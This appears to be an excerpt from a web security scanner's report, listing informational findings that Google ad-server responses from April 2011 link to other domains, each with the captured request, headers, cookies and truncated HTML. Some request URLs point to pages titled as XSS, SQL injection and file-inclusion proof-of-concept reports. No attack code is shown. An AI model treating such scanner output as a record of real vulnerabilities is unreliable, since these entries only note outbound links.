GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679383&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661383741&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661383752&frm=1&adk=2614322350&ga_vid=1211833888.1303661384&ga_sid=1303661384&ga_hid=1631627183&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36813005&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:09:40 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 18450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3Dwww.Fool.com%26adT%3DMotley%2BFool%2BStock%2BAdvisor%26adU%3Dwww.GoECart.com/Sell_More%26adT%3DEasier%2BAmazon%2BStore%2BMgmt.%26gl%3DUS&amp;usg=AFQjCNGp3Q2hZZ-O0l1qvShJES_25LwwHg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.349. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679873&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661873586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661873599&frm=1&adk=2614322350&ga_vid=1404053174.1303661874&ga_sid=1303661874&ga_hid=824907956&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:17:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3101

<html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,load:g}
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.350. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679532&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661532129&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661532134&frm=1&adk=2614322350&ga_vid=1749942376.1303661532&ga_sid=1303661532&ga_hid=1182269966&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815002&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:12:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DTourism%2B-%2BAmazonia%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DMatureSinglesOnly.com/Video%26adT%3DSingle%2Band%2BOver%2B40%253F%26adU%3Dwww.mturk.com/solution_provider.com%26adT%3DCrowdControl%26gl%3DUS&amp;usg=AFQjCNG-qlFk9AbvSe3-tGgt5BjlioCW4g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.351. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680250&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662250878&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662250889&frm=1&adk=2614322350&ga_vid=869452536.1303662251&ga_sid=1303662251&ga_hid=1912512399&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3DMoreBarStools.com%26adT%3DTop%2BBar%2BStools%2BOn%2BSale%26adU%3DPeru.travel%26adT%3DWhen%2Btravelling%2Bto%2BPeru%26gl%3DUS&amp;usg=AFQjCNHTDXoCGW3wUBf7EGrM3wZJJsaoOw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.352. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303670420&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Fhostingcataloguecom%2Fsql-injection-reflected-xss-application-error-dork-ghdb-example-poc-report.html&dt=1303657465882&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303657465887&frm=0&adk=1607234649&ga_vid=109328346.1303657466&ga_sid=1303657466&ga_hid=1778850529&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=9&xpc=4yTIePQzfu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:04:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4782

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKiUvK6u5KiNoAEQ2AUYWjIIqbPSFHRbPtg">
...[SNIP]...
YAtQvuAIYyAL8pZkYqAMB6AMF6AO6AugDpgP1AwAAAMQ%26num%3D1%26sig%3DAGiWqtyeQYEpC-jVUnUr8jorcp0_olCcng%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKiUvK6u5KiNoAEQ2AUYWjIIqbPSFHRbPtg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBz92N9ju0TbbMNY73lQfkr-yGA-ye5-oBxKumjRfAjbcBABABGAEgvs7lDTgAUJbK_tsDYMnug4jwo-wSoAHQi_DtA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBBNoBgQFodHRwOi8veHNzLmN4LzIwMTEvMDQvMjQvZG9yay9ob3N0aW5nY2F0YWxvZ3VlY29tL3NxbC1pbmplY3Rpb24tcmVmbGVjdGVkLXhzcy1hcHBsaWNhdGlvbi1lcnJvci1kb3JrLWdoZGItZXhhbXBsZS1wb2MtcmVwb3J0Lmh0bWyAAgGYAtQvuAIYyAL8pZkYqAMB6AMF6AO6AugDpgP1AwAAAMQ%26num%3D1%26sig%3DAGiWqtyeQYEpC-jVUnUr8jorcp0_olCcng%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/hostingcataloguecom/sql-injection-reflected-xss-application-error-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.ZTSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEJx3kF-kPSnAV2LfP-tddrp7VCyQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.353. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303636808&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Flocal-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm&dt=1303618808517&bpp=3&shv=r20110414&jsv=r20110415&correlator=1303618808645&frm=0&adk=1819763764&ga_vid=1507686102.1303618809&ga_sid=1303618809&ga_hid=1283241159&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=484&xpc=lY0g1JXEXh&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 04:20:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3608

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe src="http://view.atdmt.com/NYC/iview/296638392/direct;wi.728;hi.90/01/1525221968?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB1ZOz96SzTaCHAciBlgfB1pm9CavLuqcCs-L7zB-7tqGGUAAQARgBIL7O5Q04AFDzjufHBmDJ7oOI8KPsEroBCTcyOHg5MF9hc8gBCdoBZmZpbGU6Ly8vQzovY2RuLzIwMTEvMDQvMjMvZG9yay9sb2NhbC1maWxlLWluY2x1c2lvbi1yZWZsZWN0ZWQteHNzLWRvcmstZ2hkYi13d3cubmV4dGFkdmlzb3IuY29tXzgwLmh0bZgChAK4AhjAAgbIApP7mR-oAwHoA94I6AObCegDSugDB_UDAAAAxA%26num%3D1%26sig%3DAGiWqtxv_aPI1E9FH51zRYmD2J-cGTyIQA%26client%3Dca-pub-4063878933780912%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"> <script language="JavaScript" type="text/javascript">
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/23/dork/local-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dstories.citi.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE0aokVmcloT8bjnYGWCchYzO08Hg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.354. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303683775&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cross-site-scripting-example-poc-report-kroogycom.html&dt=1303665892680&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303665892741&frm=0&adk=1607234649&ga_vid=1225522717.1303665893&ga_sid=1303665893&ga_hid=1515272306&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&fu=0&ifi=1&dtd=233&xpc=jJbkyikjpt&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:24:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7226

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-ghdb-cross-site-scripting-example-poc-report-kroogycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.ntsource.com/%26adT%3DChicago%2BDedicated%2BHosting%26adU%3Dwww.provinetsolutions.com%26adT%3DManaged%2BInternet%2BChicago%26gl%3DUS&amp;usg=AFQjCNGpSUCTyO5DDRCepwRbW4m7qxLpzg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

23.355. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680924&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662924509&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303662924515&frm=1&adk=2614322350&ga_vid=1899364272.1303662925&ga_sid=1303662925&ga_hid=1398232405&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:35:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14832

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
